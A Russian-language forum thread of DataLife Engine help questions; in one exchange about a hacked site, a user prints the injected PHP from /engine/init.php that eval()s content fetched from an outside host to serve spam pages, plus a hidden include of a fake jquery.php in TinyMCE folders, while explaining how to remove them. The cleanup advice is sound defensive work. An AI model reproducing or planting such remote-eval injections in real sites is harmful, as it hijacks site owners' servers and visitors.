• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.
    Помогите модератору этого раздела killoff лично.

Помощь Вопросы по DLE (ВНИМАТЕЛЬНО читаем первый пост!!!)

Горбушка

Ищу её...
Регистрация
2 Май 2008
Сообщения
3.444
Реакции
2.524
Для просмотра ссылки Войди или Зарегистрируйся | Для просмотра ссылки Войди или Зарегистрируйся | Для просмотра ссылки Войди или Зарегистрируйся | Для просмотра ссылки Войди или Зарегистрируйся | Для просмотра ссылки Войди или Зарегистрируйся

Если у Вас недостаточно постов/уровня для создания новой темы, пишите свои вопросы здесь.

Если постов хватает - в новую тему.

Спасибо на этом форуме говорят кнопкой "Мне нравится"...
 
Последнее редактирование:
Сайт на DLE 10.1, На сайте использован скрипт фотогалереи Для просмотра ссылки Войди или Зарегистрируйся - как в ней сделать подписи к фото подскажите плз - вот так не работает [img|подпись к фото]

А подпись нужна на фотке или просто нужен атрибут alt?

Вот может подойдет Для просмотра ссылки Войди или Зарегистрируйся
Вместо текста на примере вставь теги самого дле {title} ну или же доп поля
 
Последнее редактирование:
А подпись нужна на фотке или просто нужен атрибут alt?

Вот может подойдет Для просмотра ссылки Войди или Зарегистрируйся
Вместо текста на примере вставь теги самого дле {title} ну или же доп поля

Чтобы указыннй мной скрипт Для просмотра ссылки Войди или Зарегистрируйся - работал в новости картинки располагаются в текстовом порядке:
Код:
[list]
[*][img]img_1.jpg[/img]
[*][img]img_2.jpg[/img]
[*][img]img_3.jpg[/img]
[/list]


Куда прописывать название, по вашему варианту
 
Чтобы указыннй мной скрипт Для просмотра ссылки Войди или Зарегистрируйся - работал в новости картинки располагаются в текстовом порядке:

Куда прописывать название, по вашему варианту


Сейчас на сайте этот скрипт выводит картинки в новости? Или же он идет как отдельная галерея?


Просто если обычными функциями дле грузите фотки и добавляете их на сайт, то при загрузке фото в самом дле есть возможность указать описание. Просто после загрузке нажмите на саму фотки и там откроется поле где можно вписать описание
 
Последнее редактирование:
Вопрос по поводу взлома DLE. Сам ломать не пробовал, но взломали меня. Недавно в гугле появилось сообщение, что сайт взломан. При переходе на ссылки из отчетов гугла появляется какая-то левая страница на моем сайте, вид страницы типа форума с предложением скачать какие-то карты. Никто не сталкивался с таким и как это решить?
 
Вопрос по поводу взлома DLE. Сам ломать не пробовал, но взломали меня. Недавно в гугле появилось сообщение, что сайт взломан. При переходе на ссылки из отчетов гугла появляется какая-то левая страница на моем сайте, вид страницы типа форума с предложением скачать какие-то карты. Никто не сталкивался с таким и как это решить?
Вы мне напомнили анекдот:
Мамаша с сыном подростком на приеме у врача.
-Доктор, у моего мальчика болит пися.
-Давайте посмотрим на писю, так, ага, все ясно. С этого момента "писю" называем мужским половым членом и начинаем лечить триппер.

DLE как и другая популярная ЦМС имеет уязвимости, в силу общедоступности исходного кода. О чем разработчики оповещают не таясь:
Для просмотра ссылки Войди или Зарегистрируйся
Но раз случилось тогда нужно лечиться. Но прежде чем лечиться нужно поменять пароли, явки доступа на хостинг, на длинный, не менее 12 символов с большими и малыми буковками и циферками не осмысленный, трудный для подбора (У хостеров, иногда есть возможность-сервис генерации пароля). С чем это связано - да с вирусами-троянами, черт их подери, отсюда советую проверить на вирусы ваш компьютер. Да еще использование открытого протокола FTP, с сохранением паролей в каком-нибудь виндоус коммандире, что облегчает доступ для вирусов-троянов по добыче ценной информации о "кодах доступа Зеона".
Далее вы проверяете index.php скорее всего он подменен или видоизменен. Если есть доступ в админку, проверяете антивирусником на предмет посторонних файлов на сервере. Скорее всего где-то стоит шеллка (файл с исполняемым кодом злоумышленника), при помощи которого, злоумышленник может да практически все - добавить любой файл на сервер, грохнуть базу данных и т.д.
Ели база данных не грохнута, то лучше всего удалить все, а потом поставить дистрибутив или бекап (сохранённые локально файлы с сервера).
Если восстановились из дистрибутива, то нужно подкорректировать конфиги (/engine/data/config.php и /engine/data/dbconfig.php).

Спасибо за напоминание, лишний раз сделал бекап своих сайтов.
 
Вопрос по поводу взлома DLE. Сам ломать не пробовал, но взломали меня. Недавно в гугле появилось сообщение, что сайт взломан. При переходе на ссылки из отчетов гугла появляется какая-то левая страница на моем сайте, вид страницы типа форума с предложением скачать какие-то карты. Никто не сталкивался с таким и как это решить?
Недавно прошла по моим сайтам тоже волна с такими симптомами. Все ДЛЕ были лицухи разных версию, включая последнюю, но в пределах 1 хоста, так что скорее всего уязвимость у хостера.
Выглядит эта подлива вот так:

e35f844a4829.jpg

Ссылки у тебя, скорее всего такого вида: твой.сайт/?for_um=2132

Лечить надо так:
Идешь в /engine/init.php
Открываешь его и там ищешь "-globals"
Ну и там уже по коду удаляешь условия, которые вызывают это.
У меня это были вот такие вставки в код:
Код:
if(isset($_GET***91;'for'.'_um'***93;)){
    $p = (int)$_GET***91;'for'.'_um'***93;;
    header('Content-Type: text/html; charset=windows-1251');
    echo eval('?>' . join("",file("http://gost"."-globals".".com/25."."04/62/$p.html")). '<?');
    die;
}
if(isset($_GET***91;'m'***93;)) {
    $m = (int)$_GET***91;'m'***93;;
    if($m==0)$m="";
    header('Content-Type: text/html; charset=windows-1251');
    echo eval('?>' . join("",file("http://gost"."-globals".".com/25."."04/62/map$m.html")). '<?');
    die;
} if(isset($_GET***91;'for'.'um1'***93;)) {
    header('Content-Type: text/html; charset=windows-1251');
    echo eval('?>' . join("",file("http://gost"."-globals".".com/25."."04/62/index1.html")). '<?');
    die();
} echo '';

Если никаких изменений в init.php не делал, то просто его перезалей.
Ну и если тебе модификация попалась, и это не помогло, то скачай себе всю папку engine и поиском в файлах пробей кусок урла, куда редиректит (у меня это был -globals)
 
Если никаких изменений в init.php не делал, то просто его перезалей.
Ну и если тебе модификация попалась, и это не помогло, то скачай себе всю папку engine и поиском в файлах пробей кусок урла, куда редиректит (у меня это был -globals)
Спасибо за подсказку, в общем нашел где все это зарылось. Файл init.php 51 строка вот такой инклуд:
include '/var/www/****/data/www/****/engine/editor/jscripts/tiny_mce/plugins/advimage/js/jquery/jquery.php';
Мне больше кажется что взламывали не хост, а есть дыра в тини_мсе, потому что ранее был еще один взлом, тогда мне хостеры скидывали статью, где говорилось о массовом взломе сайтов не только ДЛЕ, но и вордпресс, жумла и т.д. которые имели редактор тини_мсе.
 
писал на официальном форуме DLE но пока никто не помог с решением
Скрытое содержимое доступно для зарегистрированных пользователей!


Прошу помочь, уже длительное время приходится редактировать шаблоны через FTP так как через админку разделы шаблонов не раскрываются (спойлер или как называется, вот такой вот код:

javascript:ShowOrHide('full-story1','full-story2')

чистая установка без модов, пробовал на версиях 7.5 и 8.3
может отключена какая-то функция на хостинге?
 
чистая установка без модов, пробовал на версиях 7.5 и 8.3
может отключена какая-то функция на хостинге?
Если установка чистая без модов и хаков - без проблем обновляй на 10.2 и смотри как будет работать, если нет - пиши!!!
А вообще - у тебя проблема с JS, либо они не подключаются, либо где-то конфликтуют, либо вообще их нет...
 
Последнее редактирование:
писал на официальном форуме DLE но пока никто не помог с решением


Прошу помочь, уже длительное время приходится редактировать шаблоны через FTP так как через админку разделы шаблонов не раскрываются (спойлер или как называется, вот такой вот код:

javascript:ShowOrHide('full-story1','full-story2')

чистая установка без модов, пробовал на версиях 7.5 и 8.3
может отключена какая-то функция на хостинге?
Что говорит консоль браузера? Что говорит отчёт Network в браузере? Есть ли 3хх, 4хх, 5хх ответы сервера?
 
Назад
Сверху